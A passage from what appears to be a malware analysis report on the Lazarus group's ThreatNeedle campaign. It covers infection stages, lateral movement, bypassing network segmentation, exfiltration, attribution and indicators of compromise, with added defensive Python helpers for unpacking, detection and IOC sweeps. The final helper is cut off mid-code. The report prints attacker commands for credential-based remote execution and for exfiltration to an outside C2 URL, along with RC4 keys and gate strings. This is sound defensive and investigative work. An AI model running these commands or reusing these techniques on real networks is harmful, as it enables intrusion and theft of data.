Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened.

It then decrypts the embedded payload using the RC4 algorithm, saves it as a file with an .xml extension and a randomly created five-character file name in the current directory, and then copies it to the system folder with a .sys extension.

This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description

ThreatNeedle loader

This component is responsible for loading the final backdoor payload into memory. In order to do this, the malware uses several techniques to decrypt its payload:

  • Loading the payload from the registry.
  • Loading the payload from itself after decrypting RC4 and decompression.
  • Loading the payload from itself after decrypting AES and decompression.
  • Loading the payload from itself after decompression.
  • Loading the payload from itself after one-byte XORing.

Most loader-style malware types check the command line parameter and only proceed with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we’ve seen is similar to the ThreatNeedle installer – the malware decrypts an embedded string using RC4, and compares it with the parameter “Sx6BrUk4v4rqBFBV” upon launch. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.

The other variant of the loader prepares the next stage payload from the victim’s registry. Given the installer behavior described above, we suspect that the registry key was created by the installer component. Data retrieved from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and the export function is invoked.
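
The installer’s command-line gate and the loader’s unpacking strategies described above, as an added analyst helper (not code from the report or from the malware itself). The RC4 keys and the two magic strings are the ones quoted in the report; the encrypted inputs used for the demonstration are constructed here, and the choice of zlib for “decompression” is an assumption, since the report does not name the algorithm. The AES variant is left out because it would need a third-party library.

```python
# Added example (not code from the Kaspersky report or from the malware): an analyst
# helper that reproduces the two decoding steps the report describes for the
# ThreatNeedle installer and loader, so an incident responder can confirm a sample's
# command-line gate and unpack its embedded payload. The RC4 keys and magic strings
# are the ones quoted in the report; the encrypted blobs produced by
# make_test_blobs() are CONSTRUCTED for this demonstration, not real samples.
import zlib
from typing import Optional, Tuple

INSTALLER_RC4_KEY = bytes.fromhex("B6B72D8C6B5F14DFB138A17389C1D2C4")
LOADER_RC4_KEY = bytes.fromhex("3D68D00AB10EC6AFDDEE188EF4A1D620")
INSTALLER_MAGIC = b"7486513879852"
LOADER_MAGIC = b"Sx6BrUk4v4rqBFBV"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream). It is symmetric, so the same
    call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def gate_passes(encrypted_magic: bytes, key: bytes, argument: Optional[str],
                expected: bytes) -> bool:
    """The command-line gate both components use: decrypt the embedded string
    with RC4 and compare it with argv[1]. No argument means the decoy path
    (the report's calculator) runs and the malicious routine never starts."""
    if argument is None:
        return False
    return rc4(key, encrypted_magic) == expected and argument.encode() == expected


def unpack_loader_payload(blob: bytes, key: bytes = LOADER_RC4_KEY) -> Optional[Tuple[str, bytes]]:
    """Try the loader decoding strategies listed in the report (RC4 then
    decompression, decompression only, single-byte XOR) and return the first
    that yields a valid zlib stream or a buffer starting with the 'MZ' header.
    zlib is an ASSUMPTION: the report only says 'decompression'."""
    for name, decode in (("rc4+zlib", lambda d: zlib.decompress(rc4(key, d))),
                         ("zlib", zlib.decompress)):
        try:
            return name, decode(blob)
        except zlib.error:
            continue
    # Single-byte XOR: 256 keys are cheap to brute-force; accept the one giving 'MZ'.
    for k in range(256):
        out = bytes(b ^ k for b in blob)
        if out[:2] == b"MZ":
            return f"xor1:{k:#04x}", out
    return None


def make_test_blobs(payload: bytes) -> dict:
    """CONSTRUCTED inputs: the same payload packed the way two loader variants
    expect to find it (RC4 over a zlib stream, and single-byte XOR with 0x5A)."""
    return {
        "rc4+zlib": rc4(LOADER_RC4_KEY, zlib.compress(payload)),
        "xor1": bytes(b ^ 0x5A for b in payload),
    }


if __name__ == "__main__":
    sample = b"MZ" + b"\x90" * 32 + b"constructed fake payload"
    for kind, blob in make_test_blobs(sample).items():
        print(kind, "->", unpack_loader_payload(blob))
```

Run against a real sample, the blob handed to `unpack_loader_payload` would be the embedded resource carved out of the loader, and the gate check would use the encrypted string carved from the installer; the key order of the candidates mirrors the report’s list so the cheapest, most common variant is tried first.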

ThreatNeedle backdoor

The final payload executed in memory is the actual ThreatNeedle backdoor. It has the following functionality to control infected victim machines:

  • Manipulate files/directories
  • System profiling
  • Control backdoor processes
  • Enter sleeping or hibernation mode
  • Update backdoor configuration
  • Execute received commands

Post-exploitation phase

From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation”.

Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary intention of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a custom tool that will be described in the “Exfiltration” section. Below is a rough timeline of the compromise we investigated:

Timeline of infected hosts

Credential gathering

During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command:

  • [Responder file path] -i [IP address] -rPv

Several days later, the attacker started to move laterally originating from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.

Lateral movement

After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use”.

  • net use \\[IP address]\IPC$ "[password]" /u:"[user name]" > $temp\~tmp5936t.tmp 2>&1

Next, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).

  • exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd.exe /c $appdata\Adobe\adobe.bat"
  • exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd /c sc queryex helpsvc > $temp\tmp001.dat"

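The two command patterns above are what a detection engineer would want to alert on. The following is an added example (not code from the report) that runs two such rules over constructed process-creation records and correlates them per host; the record layout (host|user|command line) is an assumption for the demonstration and not any product’s log format, and in practice the same regexes would be applied to the CommandLine field of Sysmon event 1 or Windows security event 4688.

```python
# Added example (not code from the report): a detector for the lateral movement
# command patterns described above, run over CONSTRUCTED process-creation records.
# The record layout (host|user|command line) is an assumption for the demo.
import re
from collections import defaultdict
from typing import Dict, List

# CONSTRUCTED records: two mirror the report's commands, two are benign noise.
SAMPLE_LOG = r"""
WS01|admin|C:\Windows\System32\net.exe use \\10.0.0.5\IPC$ "P@ssw0rd!" /u:"CORP\svc_it" > C:\Temp\~tmp5936t.tmp 2>&1
WS01|admin|C:\Windows\System32\wbem\wmic.exe /node:10.0.0.5 /user:"CORP\svc_it" /password:"P@ssw0rd!" PROCESS CALL CREATE "cmd.exe /c C:\Users\admin\AppData\Roaming\Adobe\adobe.bat"
WS02|jdoe|C:\Windows\System32\net.exe use Z: \\fileserver\share /persistent:yes
WS03|admin|C:\Windows\System32\wbem\wmic.exe os get caption
"""

# Rule 1: 'net use' to the IPC$ share with an inline password and an explicit
#         /u: account, the exact form quoted in the report.
# Rule 2: WMIC pointed at a remote /node: with 'process call create'.
RULES = [
    ("net_use_ipc_with_creds",
     re.compile(r"\bnet(?:\.exe)?\s+use\s+\\\\\S+\\IPC\$\s+\S+.*\s/u(?:ser)?:", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(?:\.exe)?\s.*?/node:\S+.*?\bprocess\s+call\s+create\b", re.I)),
]

# Never copy captured credentials into an alert: mask them before reporting.
_PASSWORD_ARGS = re.compile(r'(/password:)"[^"]*"|(IPC\$\s+)"[^"]*"', re.I)


def redact(cmdline: str) -> str:
    return _PASSWORD_ARGS.sub(lambda m: (m.group(1) or m.group(2)) + '"***"', cmdline)


def parse_record(line: str) -> Dict[str, str]:
    host, user, cmdline = line.split("|", 2)
    return {"host": host, "user": user, "cmdline": cmdline}


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one alert per (record, rule) match, with the command line redacted."""
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_record(raw)
        for rule, rx in RULES:
            if rx.search(rec["cmdline"]):
                alerts.append({"rule": rule, "host": rec["host"], "user": rec["user"],
                               "cmdline": redact(rec["cmdline"])})
    return alerts


def hosts_with_full_chain(alerts: List[Dict[str, str]]) -> List[str]:
    """Hosts on which both rules fired. Share mapping followed by remote
    execution is the sequence the report describes, so this is the
    higher-confidence signal to escalate first."""
    seen = defaultdict(set)
    for a in alerts:
        seen[a["host"]].add(a["rule"])
    wanted = {"net_use_ipc_with_creds", "wmic_remote_process_create"}
    return sorted(h for h, rules in seen.items() if rules >= wanted)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(a["host"], a["rule"], a["cmdline"])
    print("full chain on:", hosts_with_full_chain(found))
```

Both rules are deliberately narrow: an administrator mapping a drive letter or querying WMI locally does not fire them, while a password passed on the command line to a remote IPC$ or WMIC call is unusual enough in most estates to justify a ticket on its own.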
Overcoming network segmentation

In the course of this research, we identified another highly interesting technique used by the attackers for lateral movement and exfiltration of stolen data. The enterprise network under attack was divided into two segments: corporate (a network on which computers had internet access) and restricted (a network on which computers hosted sensitive data and had no internet access). According to corporate policies, no transfer of information was allowed between these two segments. In other words, the two segments were meant to be completely separated.

Initially, the attackers were able to get access to systems with internet access and spent a long time distributing malware between machines in the network’s corporate segment. Among the compromised machines were those used by the administrators of the enterprise’s IT infrastructure.

It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a result, by gaining control of administrator workstations the attackers were able to access the restricted network segment.

However, since directly routing traffic between the segments was not possible, the attackers couldn’t use their standard malware set to exfiltrate data from the restricted segment to the C2.

The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. The router was a virtual machine running CentOS to route traffic between several network interfaces based on predefined rules.

Connection layout between victim’s network segments

According to the evidence collected, the attackers scanned the router’s ports and detected a Webmin interface. Next, the attackers logged in to the web interface using a privileged root account. It’s unknown how the attackers were able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the infected system’s browser password managers.

Log listing Webmin web interface logins

By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization’s corporate and restricted segments.

List of services used on the router

Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTY PSCP utility (the PuTTY Secure Copy client) on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.

New connection layout after attacker’s intrusion

In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.

Hardcoded proxy address in the malware

Since the attackers regularly deleted log files from the router, only a handful of commands entered at the command line via SSH could be recovered. An analysis of these commands shows that the attackers tried to reconfigure traffic routing using the route command.

Attacker commands

The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files.

Webmin log

Exfiltration

We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four parameters: client IP address, client port, server IP address and server port. The tool offers basic functionality, forwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic using trivial binary encryption.

Encryption routine

Using the covert channel, the adversary copied data from the remote server over to the host using the PuTTY PSCP tool:

  • %APPDATA%\PBL\unpack.tmp  -pw [password] root@[IP address]:/tmp/cab0215 %APPDATA%\PBL\cab0215.tmp

After copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server. This malware looks like a legitimate VNC client and runs like one if it’s executed without any command line parameters.

Execution of malware without parameters

However, if this application is executed with specific command line parameters, it runs an alternate, malicious function. According to our telemetry, the actor executed this application with six parameters:

  • %APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000

Also, if the number of command line parameters is greater than six, the malware jumps into a malicious routine. The malware also checks the length of the second argument – if it’s less than 29 characters, it terminates the execution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next payload.

The embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the preceding byte. Next, the XORed blob receives the second command line argument that’s provided (in this case S0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and depending on how many there are it runs differently. For example, it can also receive proxy server addresses with the “-p” option.

When the decrypted in-memory payload is executed, it compares the header of the configuration data passed with the string “0x8406” in order to confirm its validity. The payload opens a given file (in this example %APPDATA%\Comms\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data to the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:

  • The ‘fr’ parameter contains the file name from the command line argument to upload.
  • The ‘fp’ parameter contains the base64 encoded size, CRC32 value of content and file contents.
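
The XOR pass and the ‘fr’/‘fp’ upload format described in the two preceding paragraphs, as an added decoder meant for checking proxy captures or sandbox output (not code from the report or from the malware). Where the report leaves a detail open it is assumed here and labelled: the XOR step is read as a suffix chain (byte i-1 ^= byte i, walking from the end), and the ‘fp’ layout as a little-endian 4-byte size, a 4-byte CRC32 and the raw contents, all base64-encoded. The sample bodies are constructed for the demonstration.

```python
# Added example (not code from the report or the malware): decoders for the two
# wire-format details described above. ASSUMPTIONS, labelled: the XOR chain is a
# suffix chain, and the 'fp' layout is <size:u32le><crc32:u32le><contents>, base64.
# All sample inputs are CONSTRUCTED for the demonstration.
import base64
import binascii
import struct
from typing import Optional
from urllib.parse import parse_qs, urlencode

FP_HEADER = struct.Struct("<II")  # assumed: size, CRC32


def xor_chain_decode(data: bytes) -> bytes:
    """Undo the payload encoding: from the end, XOR each byte into its
    predecessor. Because byte i is already decoded when it is applied to
    byte i-1, the result is d[i] = e[i] ^ d[i+1]; the last byte is untouched."""
    buf = bytearray(data)
    for i in range(len(buf) - 1, 0, -1):
        buf[i - 1] ^= buf[i]
    return bytes(buf)


def xor_chain_encode(data: bytes) -> bytes:
    """Inverse of xor_chain_decode (e[i] = d[i] ^ d[i+1]); only used here to
    build constructed test input."""
    buf = bytearray(data)
    for i in range(len(buf) - 1):
        buf[i] ^= buf[i + 1]
    return bytes(buf)


def parse_fp(fp_value: str) -> dict:
    """Split a decoded 'fp' value into its fields and verify the two integrity
    values it carries. A body whose embedded size and CRC32 both agree with the
    payload is very unlikely to match by coincidence, which makes this a
    high-confidence network indicator."""
    raw = base64.b64decode(fp_value, validate=True)
    if len(raw) < FP_HEADER.size:
        raise ValueError("fp value shorter than its header")
    size, crc = FP_HEADER.unpack_from(raw)
    content = raw[FP_HEADER.size:]
    return {
        "size": size,
        "crc32": crc,
        "content": content,
        "size_ok": size == len(content),
        "crc_ok": crc == (binascii.crc32(content) & 0xFFFFFFFF),
    }


def inspect_post_body(body: str) -> Optional[dict]:
    """Apply the 'fr'/'fp' check to one urlencoded POST body. Returns None when
    the body does not carry both parameters, and matches_format=False when it
    does but the embedded size/CRC do not fit the assumed layout."""
    params = parse_qs(body, keep_blank_values=True)
    if "fr" not in params or "fp" not in params:
        return None
    try:
        info = parse_fp(params["fp"][0])
    except (ValueError, binascii.Error):
        return {"filename": params["fr"][0], "matches_format": False}
    info["filename"] = params["fr"][0]
    info["matches_format"] = info["size_ok"] and info["crc_ok"]
    return info


def constructed_post_body(filename: str, content: bytes) -> str:
    """CONSTRUCTED body in the assumed format, for the demonstration only."""
    header = FP_HEADER.pack(len(content), binascii.crc32(content) & 0xFFFFFFFF)
    fp = base64.b64encode(header + content).decode("ascii")
    return urlencode({"fr": filename, "fp": fp})


if __name__ == "__main__":
    body = constructed_post_body("cab59.tmp", b"constructed secret document contents")
    print(inspect_post_body(body))
```

Because the report gives only the field list and not the byte layout, a real deployment would first confirm the header width and byte order against a captured request; the `matches_format` flag is what a proxy or IDS post-processor would key an alert on, and `filename` is the value to correlate with file access on the host.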

Contents of fp parameter

Attribution

We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several clusters of the Lazarus group.

Connections between Lazarus campaigns

Connection with DeathNote cluster

During this investigation we identified several connections with the DeathNote (a.k.a. Operation Dream Job) cluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.

In addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also discovered on the DeathNote C2 server. We also identified that the server script corresponding to the Trojanized VNC Uploader was found on the DeathNote C2 server.

Although DeathNote and this incident show different TTPs, both campaigns share command and control infrastructure and some victimology.

Connection with Operation AppleJeus

We also found a connection with Operation AppleJeus. As we described, the actor used a homemade tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was utilized in Operation AppleJeus as well.

Same tunneling tool

Connection with Bookcode cluster

In our previous blog about the Lazarus group, we mentioned the Bookcode cluster attributed to the Lazarus group; recently the Korea Internet and Security Agency (KISA) also published a report about the operation. In that report, they mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads. While investigating this incident, we also found LPEClient on the host infected with ThreatNeedle. So, we assess that the ThreatNeedle cluster is connected to the Bookcode operation.

Conclusions

In recent years, the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks.

This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and infrastructure among these campaigns to accomplish their goals.

Appendix I – Indicators of Compromise

Malicious documents

e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx

Installer

b191cc4d73a247afe0a62a8c38dc9137 %APPDATA%\Microsoft\DRM\logon.bin
9e440e231ef2c62c78147169a26a1bd3 C:\ProgramData\ntnser.bin
b7cc295767c1d8c6c68b1bb6c4b4214f C:\ProgramData\ntnser.bin
0f967343e50500494cf3481ce4de698c C:\ProgramData\Microsoft\MSDN\msdn.bin
09aa1427f26e7dd48955f09a9c604564 %APPDATA\Microsoft\info.dat
07b22533d08f32d48485a521dbc1974d C:\ProgramData\adobe\load.dat
1c5e4d60a1041cf2903817a31c1fa212 C:\ProgramData\Adobe\adobe.tmp
4cebc83229a40c25434c51ee3d6be13e C:\ProgramData\Adobe\up.tmp
23b04b18c75aa7d286fea5d28d41a830 %APPDATA%\Microsoft\DRM\logon.dat
319ace20f6ffd39b7fff1444f73c9f5d %APPDATA%\Microsoft\DRM\logon.bin
45c0a6e13cad26c69eff59fded88ef36 %APPDATA%\Microsoft\DRM\logon.dat
486f25db5ca980ef4a7f6dfbf9e2a1ad C:\ProgramData\ntusers.dat
1333967486d3ab50d768fb745dae9af5 C:\PerfLogs\log.bin
07b22533d08f32d48485a521dbc1974d C:\ProgramData\Adobe\load.dat
c86d0a2fa9c4ef59aa09e2435b4ab70c %TEMP%\ETS4659.tmp
69d71f06fbfe177fb1a5f57b9c3ae587 %APPDATA%\Microsoft\Windows\shsvcs.db
7bad67dcaf269f9ee18869e5ef6b2dc1
956e5138940a4f44d1c2c24f122966bd %APPDATA%\ntuser.bin

Loader

ed627b7bbf7ea78c343e9fb99783c62b
1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin
fa9635b479a79a3e3fba3d9e65b842c3
3758bda17b20010ff864575b0ccd9e50 %SYSTEMROOT%\system\mraudio.drv
cbcf15e272c422b029fcf1b82709e333 %SYSTEMROOT%\system\mraudio.drv
9cb513684f1024bea912e539e482473a
36ab0902797bd18acd6880040369731c %SYSTEMROOT%\LogonHours.sys
db35391857bcf7b0fa17dbbed97ad269 %ALLUSERSPROFILE%\Adobe\update.tmp
be4c927f636d2ae88a1e0786551bf3c4 %ALLUSERSPROFILE%\Adobe\unpack.tmp
728948c66582858f6a3d3136c7fbe84a %APPDATA%\Microsoft\IBM.DAT
06af39b9954dfe9ac5e4ec397a3003fb
29c5eb3f17273383782c716754a3025a
79d58b6e850647024fea1c53e997a3f6
e604185ee40264da4b7d10fdb6c7ab5e
2a73d232334e9956d5b712cc74e01753
1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin
459be1d21a026d5ac3580888c8239b07 %ALLUSERSPROFILE%\ntuser.bin
87fb7be83eff9bea0d6cc95d68865564 %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys
062a40e74f8033138d19aa94f0d0ed6e %APPDATA%\microsoft\OutIook.db
9b17f0db7aeff5d479eaee8056b9ac09 %TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp
9b17f0db7aeff5d479eaee8056b9ac09 %APPDATA%\Temp\BTM0345.tmp
420d91db69b83ac9ca3be23f6b3a620b
238e31b562418c236ed1a0445016117c %APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db
36ab0902797bd18acd6880040369731c
238e31b562418c236ed1a0445016117c %TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db
ad1a93d6e6b8a4f6956186c213494d17 %APPDATA%\Microsoft\Windows\shsvcs.db
c34d5d2cc857b6ee9038d8bb107800f1

Registry Loader

16824dfd4a380699f3841a6fa7e52c6d
aa74ed16b0057b31c835a5ef8a105942
85621411e4c80897c588b5df53d26270 %SYSTEMROOT%\system\avimovie.dll
a611d023dfdd7ca1fab07f976d2b6629
160d0e396bf8ec87930a5df46469a960 %WINDIR%\winhelp.dll
110e1c46fd9a39a1c86292487994e5bd

Downloader

ac86d95e959452d189e30fa6ded05069 %APPDATA%\Microsoft\thumbnails.db

Trojanized VNC Uploader

bea90d0ef40a657cb291d25c4573768d %ALLUSERSPROFILE%\adobe\arm86.dat
254a7a0c1db2bea788ca826f4b5bf51a %APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat

Tunneling Tool

6f0c7cbd57439e391c93a2101f958ccd %APPDATA\PBL\update.tmp
fc9e7dc13ce7edc590ef7dfce12fe017

LPEClient

0aceeb2d38fe8b5ef2899dd6b80bfc08 %TEMP%\ETS5659.tmp
09580ea6f1fe941f1984b4e1e442e0a5 %TEMP%\ETS4658.tmp

File path
%SYSTEMROOT%\system32\bcdbootinfo.tlp
%SYSTEMROOT%\system32\Nwsapagent.sys
%SYSTEMROOT%\system32\SRService.sys
%SYSTEMROOT%\system32\NWCWorkstation.sys
%SYSTEMROOT%\system32\WmdmPmSp.sys
%SYSTEMROOT%\system32\PCAudit.sys
%SYSTEMROOT%\system32\helpsvc.sys

Registry Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig – SubVersion

Domains and IPs
hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php
hxxp://www.au-pair[.]org/admin/Newspaper[.]asp
hxxp://www.au-pair[.]org/admin/login[.]asp
hxxp://www.colasprint[.]com/_vti_log/upload[.]asp
hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp
hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp
hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp
hxxp://www.sanatoliacare[.]com/include/index[.]asp
hxxps://americanhotboats[.]com/forums/core/cache/index[.]php
hxxps://docentfx[.]com/wp-admin/includes/upload[.]php
hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php
hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php
hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php
hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp
hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp
hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php
hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp
hxxps://www.curiofirenze[.]com/include/inc-site[.]asp
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.dronerc[.]it/forum/uploads/index[.]php
hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php
hxxps://www.edujikim[.]com/intro/blue/view[.]asp
hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp
hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp
hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp
hxxps://www.fabioluciani[.]com/es/include/include[.]asp
hxxp://www.juvillage.co[.]kr/img/upload[.]asp
hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp
hxxps://www.lyzeum[.]com/images/board/upload[.]asp
hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php
hxxps://www.polyboatowners[.]com/css/index[.]php
hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp
hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php
hxxp://156.245.16[.]55/admin/admin[.]asp
hxxp://fredrikarnell[.]com/marocko2014/index[.]php
hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp

Second stage C2 address
hxxps://www.waterdoblog[.]com/uploads/index[.]asp
hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp

C2 URLs to exfiltrate files used by Trojanized VNC Uploader
hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php
hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php
hxxps://mdim.in[.]ua:443/core/cache/index[.]php
hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php
hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp
hxxps://www.dellarocca[.]net/it/content/img/img[.]asp
hxxps://www.astedams[.]it/photos/image/image[.]asp
hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php
hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp
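
The file indicators in this appendix as a host-side sweep, added here as an example (not code from the report): it hashes every file under a directory tree, compares the MD5 values with a subset of those listed above, and also flags file names the report ties to ThreatNeedle, such as the look-alike OutIook.db (capital I rather than a lower-case l). Only a subset of the report’s hashes is embedded and the rest can be appended in the same format; the directory the demonstration scans is a constructed temporary fixture.

```python
# Added example (not code from the report): a sweep for the file indicators in
# Appendix I. Hashes and file names below are copied from the appendix (subset);
# build_demo_tree() creates CONSTRUCTED temporary files for the demonstration.
import hashlib
import os
import tempfile
from typing import Dict, List

# MD5 -> component, copied from Appendix I (subset).
KNOWN_MD5: Dict[str, str] = {
    "e7aa0237fc3db67a96ebd877806a2c88": "Malicious document (Boeing_AERO_GS.docx)",
    "b191cc4d73a247afe0a62a8c38dc9137": "Installer",
    "9e440e231ef2c62c78147169a26a1bd3": "Installer",
    "1a17609b7df20dcb3bd1b71b7cb3c674": "Loader",
    "238e31b562418c236ed1a0445016117c": "Loader",
    "85621411e4c80897c588b5df53d26270": "Registry Loader",
    "ac86d95e959452d189e30fa6ded05069": "Downloader",
    "bea90d0ef40a657cb291d25c4573768d": "Trojanized VNC Uploader",
    "6f0c7cbd57439e391c93a2101f958ccd": "Tunneling Tool",
    "0aceeb2d38fe8b5ef2899dd6b80bfc08": "LPEClient",
}

# File names taken from the report's drop paths; compared case-insensitively.
KNOWN_NAMES: Dict[str, str] = {
    "bcdbootinfo.tlp": "Installer marker file (infection time + service name)",
    "lconcaches.db": "Loader payload path",
    "onedrives.lnk": "Startup shortcut",
    "shsvcs.db": "Loader payload path",
    "outiook.db": "Loader payload path (look-alike of Outlook.db, capital I)",
    "mraudio.drv": "Loader payload path",
    "logonhours.sys": "Loader payload path",
}


def md5_of(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root: str, known_md5: Dict[str, str] = KNOWN_MD5,
              known_names: Dict[str, str] = KNOWN_NAMES) -> List[dict]:
    """Walk root and return one finding per matching file (a file can match on
    both name and hash). Unreadable files are skipped, not fatal."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name.lower() in known_names:
                findings.append({"path": full, "name": name, "kind": "name",
                                 "label": known_names[name.lower()]})
            try:
                digest = md5_of(full)
            except OSError:
                continue
            if digest in known_md5:
                findings.append({"path": full, "name": name, "kind": "md5",
                                 "label": known_md5[digest], "md5": digest})
    return findings


def build_demo_tree() -> dict:
    """CONSTRUCTED fixture: a temp directory with one look-alike file name, one
    benign file and one file whose hash the caller can register as 'known'."""
    root = tempfile.mkdtemp(prefix="threatneedle_demo_")
    files = {
        "OutIook.db": b"constructed: name match only",
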